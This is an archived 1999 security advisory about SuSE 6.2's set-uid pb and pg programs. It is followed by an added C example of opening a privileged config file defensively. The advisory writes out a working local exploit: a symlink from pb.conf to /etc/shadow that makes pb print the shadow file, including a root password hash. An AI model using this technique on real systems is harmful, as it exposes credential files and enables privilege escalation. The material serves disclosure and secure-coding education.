Packet Storm PACKETSTORM:16063
Sep 28, 1999 - 12:00 a.m.

suse6.2pbpg.txt

`Brock Tellier [[email protected]]  
Sent: Thursday, September 16, 1999 5:06 PM  
Subject: Two SuSE 6.2 local root exploits  
  
Greetings,  
  
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow  
any user to read any file on the system as shown:  
  
susebox:/root # ls -la /usr/bin/pb  
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb  
  
susebox:/root # strace /usr/bin/pb  
...  
personality(PER_LINUX) = 0  
getpid() = 16623  
brk(0) = 0x805032c  
brk(0x80504cc) = 0x80504cc  
brk(0x8051000) = 0x8051000  
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or  
directory)  
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such  
file or directory  
) = 41  
_exit(1) = ?  
susebox:/root #  
  
---  
xnec@susebox:/tmp > id  
uid=1001(xnec) gid=100(users) groups=100(users)  
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf  
xnec@susebox:/tmp > pb  
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =  
<bin:*:8902:0:10000::::>  
Unknown config line : <daemon:*:8902:0:10000::::> =  
<lp:*:9473:0:10000::::>  
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>  
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>  
... etc for the entire shadow file  
  
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two  
programs also contain numerous buffer overflows and other insecure file  
i/o and should obviously lose their suid bits. They cannot operate  
correctly without their s-bits unless they are run by root, but no one  
besides root will run them anyway. These programs are not worth  
patching.  
  
Brock Tellier  
UNIX Systems Administrator  
Webley Systems  
www.webley.com  
`
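
The strace output above shows a set-uid program opening `pb.conf` relative to the caller's working directory and following a symlink placed there. As an added example (not code from the advisory or from SuSE), this C code shows how a privileged program can open its config file defensively; the function name `open_trusted_config`, the `owner` parameter and the temporary-directory demo are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a config file on behalf of a privileged program.
 * Returns a read-only fd, or -1 with errno set. The path must be absolute
 * (never resolved against the caller's cwd), its last component must not be
 * a symlink, and the file must be a regular file owned by `owner` that is
 * not writable by group or other. */
int open_trusted_config(const char *path, uid_t owner)
{
    struct stat st;
    int fd;
    if (path == NULL || path[0] != '/') { errno = EINVAL; return -1; }
    /* O_NONBLOCK: do not hang on a FIFO before the fstat() check runs. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return -1;                 /* ELOOP on Linux for a symlink */
    if (fstat(fd, &st) != 0) { close(fd); return -1; }
    if (!S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Constructed scenario: pb.conf is a symlink to a file standing in for
 * /etc/shadow. Returns 1 when every case behaves as expected. */
int demo(void)
{
    char dir[] = "/tmp/pbdemoXXXXXX", target[64], link_path[64];
    int ok = 1, fd;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/secret", dir);
    snprintf(link_path, sizeof link_path, "%s/pb.conf", dir);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(target, link_path) != 0) return 0;
    close(fd);
    ok &= open_trusted_config("pb.conf", geteuid()) == -1 && errno == EINVAL;
    ok &= open_trusted_config(link_path, geteuid()) == -1;  /* symlink */
    fd = open_trusted_config(target, geteuid());            /* real file */
    ok &= fd >= 0;
    if (fd >= 0) close(fd);
    unlink(link_path); unlink(target); rmdir(dir);
    return ok;
}
int main(void) { printf("checks %s\n", demo() ? "passed" : "failed"); return 0; }
```

In a real set-uid binary `owner` would be 0 and the path a fixed absolute location. The parser would also need to stop echoing unparsed lines back to the user, which is how the shadow entries reach the terminal in the session above.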